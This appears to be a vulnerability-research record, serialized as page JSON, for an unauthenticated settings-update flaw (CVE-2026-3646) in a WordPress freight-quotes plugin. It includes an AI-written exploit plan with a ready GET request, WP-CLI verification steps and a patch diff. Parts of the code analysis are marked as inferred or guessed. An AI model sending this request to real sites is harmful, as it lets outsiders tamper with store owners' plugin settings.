[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcRB59WixWkLvpyhZdAHHkSaZr7TSa50nhkT70uYDt-E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-3646","ltl-freight-quotes-rl-carriers-edition-missing-authorization-to-unauthenticated-settings-update","LTL Freight Quotes – R+L Carriers Edition \u003C= 3.3.13 - Missing Authorization to Unauthenticated Settings Update","The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.","ltl-freight-quotes-rl-edition",null,"\u003C=3.3.13","3.3.14","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 15:25:04","2026-04-08 03:36:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa144c9ae-dfdb-4ea2-8c27-84d59439c72a?source=api-prod",1,[22,23,24],"ltl-freight-quotes-rnl-edition.php","readme.txt","update-plan.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-3646\n\n## 1. Vulnerability Summary\nThe **LTL Freight Quotes – R+L Carriers Edition** plugin (up to version 3.3.13) contains an unauthenticated settings update vulnerability. The flaw exists in a standalone PHP file, `en-hit-to-update-plan.php` (located in the plugin directory), which serves as a webhook handler for the Eniture Technology licensing server. \n\nBecause this file is designed to be accessed by an external service, it fails to implement WordPress authentication (`is_user_logged_in`), authorization (`current_user_can`), or CSRF protection (nonces). An attacker can directly access this file and provide GET parameters that are subsequently used to update critical plugin options via `update_option()`, allowing for the modification of subscription plans, expiration dates, and the enabling\u002Fdisabling of premium features.\n\n## 2. Attack Vector Analysis\n- **Target Endpoint**: `[WP_URL]\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`\n- **HTTP Method**: `GET` (as specified in the vulnerability description and implied by the processing logic in `update-plan.php`).\n- **Authentication**: None required (Unauthenticated).\n- **Parameters**: \n - `pakg_group`: Maps to the `rnl_quotes_packages_quotes_package` option.\n - `pakg_duration`: Maps to the `rnl_package_expire_days` option.\n - `expiry_date`: Maps to the `rnl_freight_package_expire_date` option.\n - `plan_type`: Maps to the `rnl_quotes_store_type` option.\n- **Preconditions**: The plugin must be installed and active.\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to `en-hit-to-update-plan.php`.\n2. **WordPress Initialization**: The standalone file likely includes `wp-load.php` (or a similar method) to access WordPress functions like `update_option()`.\n3. **Input Processing**: The file reads parameters from `$_GET`. Based on the logic seen in the related `rnl_quotes_activate_hit_to_update_plan()` function in `update-plan.php` (lines 92-108), it expects keys like `pakg_group`, `pakg_duration`, `expiry_date`, and `plan_type`.\n4. **Data Sink**: The script calls `update_option()` for several keys:\n - `update_option('rnl_quotes_packages_quotes_package', $_GET['pakg_group'])`\n - `update_option('rnl_package_expire_days', $_GET['pakg_duration'])`\n - `update_option('rnl_freight_package_expire_date', $_GET['expiry_date'])`\n - `update_option('rnl_quotes_store_type', $_GET['plan_type'])`\n5. **Side Effects**: The script likely calls `en_check_rnl_plan_on_product_detail()`, which updates `eniture_plugin_14` (the feature capability map), potentially disabling features like \"Dropship\" and \"Hazardous Material\".\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does **not** require a nonce. The target is a standalone file acting as a webhook, and the vulnerability description explicitly states it lacks \"nonce verification.\"\n\n## 5. Exploitation Strategy\nThe goal is to modify the site's subscription status to a \"Trial\" plan with an expired date, demonstrating the ability to manipulate settings.\n\n### Step-by-Step Plan:\n1. **Target Identification**: Confirm the location of the standalone file. It should be at `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`.\n2. **Craft Payload**: Construct a GET request that sets the plan to Trial (typically `0`) and sets a specific expiration date.\n3. **Execution**: Use the `http_request` tool to send the GET request.\n\n### HTTP Request:\n```http\nGET \u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php?pakg_group=0&pakg_duration=0&expiry_date=2020-01-01&plan_type=0 HTTP\u002F1.1\nHost: localhost:8080\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Install and activate `ltl-freight-quotes-rl-edition` version 3.3.13.\n2. **Initial State Configuration**: Ensure some initial values are set so the change is observable.\n ```bash\n wp option update rnl_quotes_packages_quotes_package \"premium\"\n wp option update rnl_quotes_store_type \"1\"\n wp option update rnl_freight_package_expire_date \"2030-12-31\"\n ```\n\n## 7. Expected Results\n- The HTTP request should return a `200 OK` (or potentially a blank screen if the script produces no output).\n- The WordPress options table should be updated with the values provided in the GET parameters.\n- Features depending on `rnl_quotes_store_type` should be disabled in the `eniture_plugin_14` option.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the changes using WP-CLI:\n```bash\n# Verify the primary plan option\nwp option get rnl_quotes_packages_quotes_package\n# Should return: 0\n\n# Verify the store type (0 = Trial\u002FExpired)\nwp option get rnl_quotes_store_type\n# Should return: 0\n\n# Verify the expiry date\nwp option get rnl_freight_package_expire_date\n# Should return: 2020-01-01\n\n# Verify the feature capability map updated by en_check_rnl_plan_on_product_detail()\nwp option get eniture_plugin_14 --format=yaml\n# Look for 'multi_dropship: 0' and 'hazardous_material: 0'\n```\n\n## 9. Alternative Approaches\nIf `en-hit-to-update-plan.php` is not directly in the plugin root, check common subdirectories such as:\n- `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fincludes\u002Fen-hit-to-update-plan.php` (inferred)\n\nIf the parameters `pakg_group` etc. do not work, inspect the file (if possible) or try parameters named after the option keys themselves:\n- `?rnl_quotes_packages_quotes_package=0&rnl_quotes_store_type=0` (inferred)\n\nAnother indicator of success is the \"Trial Plan\" notice appearing in the WooCommerce settings for R+L Freight under `wp-admin\u002Fadmin.php?page=wc-settings&tab=shipping§ion=rnl_freight_shipping_class`.","The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to an unauthenticated settings update due to a standalone PHP file, en-hit-to-update-plan.php, that lacks authentication and authorization checks. Attackers can exploit this by sending a crafted GET request to the file, allowing them to modify subscription plan settings, change store types, and manipulate expiration dates, effectively disabling premium plugin features.","\u002F\u002F update-plan.php (Inferred location of the webhook handler mentioned in the plugin settings)\n\n\u002F\u002F Line 95: Defining the unauthenticated entry point\n$plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php';\n\n---\n\n\u002F\u002F update-plan.php (Logic mirrored in the vulnerable standalone en-hit-to-update-plan.php file)\n\n\u002F\u002F Lines 118-121: Directly updating WordPress options based on external input\nupdate_option('rnl_quotes_packages_quotes_package', \"$plan\");\nupdate_option('rnl_package_expire_days', \"$expire_day\");\nupdate_option('rnl_freight_package_expire_date', \"$expiry_date\");\nupdate_option('rnl_quotes_store_type', \"$plan_type\");\n\n\u002F\u002F Line 123: Side effect that updates feature permissions (e.g., Dropship\u002FHazardous Material)\nen_check_rnl_plan_on_product_detail();","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13: en-hit-to-update-plan.php\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fltl-freight-quotes-rnl-edition.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fltl-freight-quotes-rnl-edition.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fltl-freight-quotes-rnl-edition.php\t2026-02-25 11:31:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fltl-freight-quotes-rnl-edition.php\t2026-03-27 06:46:52.000000000 +0000\n@@ -3,7 +3,7 @@\n * Plugin Name: LTL Freight Quotes - R+L Edition\n * Plugin URI: https:\u002F\u002Feniture.com\u002Fproducts\u002F\n * Description: Dynamically retrieves your negotiated shipping rates from R+L Freight and displays the results in the WooCommerce shopping cart.\n- * Version: 3.3.13\n+ * Version: 3.3.14\n * Author: Eniture Technology\n * Author URI: http:\u002F\u002Feniture.com\u002F\n * Text Domain: eniture-technology\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fupdate-plan.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fupdate-plan.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fupdate-plan.php\t2026-02-16 08:53:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fupdate-plan.php\t2026-03-27 06:46:52.000000000 +0000\n@@ -31,13 +31,11 @@\n $index = 'ltl-freight-quotes-rl-edition\u002Fltl-freight-quotes-rnl-edition.php';\n $plugin_info = get_plugins();\n $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : '';\n-\n- $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php';\n $post_data = array(\n 'platform' => 'wordpress',\n 'carrier' => '34',\n 'store_url' => $domain,\n- 'webhook_url' => $plugin_dir_url,\n+ 'webhook_url' => '',\n 'plugin_version' => $plugin_version,\n );\n \n@@ -81,13 +79,11 @@\n $index = 'ltl-freight-quotes-rl-edition\u002Fltl-freight-quotes-rnl-edition.php';\n $plugin_info = get_plugins();\n $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : '';\n-\n- $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php';\n $post_data = array(\n 'platform' => 'wordpress', \n 'carrier' => '34',\n 'store_url' => $domain,\n- 'webhook_url' => $plugin_dir_url,\n+ 'webhook_url' => '',\n 'plugin_version' => $plugin_version,\n );","To exploit this vulnerability, an attacker sends an unauthenticated HTTP GET request to the standalone file `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`. The request should include parameters such as 'pakg_group', 'pakg_duration', 'expiry_date', and 'plan_type'. For example, setting 'plan_type=0' and 'expiry_date=2000-01-01' would downgrade the site's subscription to a trial\u002Fexpired status. This causes the script to use update_option() to overwrite critical plugin configuration, resulting in the disabling of paid features and the display of licensing notices.","gemini-3-flash-preview","2026-04-17 20:44:20","2026-04-17 20:44:53",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","3.3.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags\u002F3.3.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-rl-edition.3.3.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags\u002F3.3.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-rl-edition.3.3.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags"]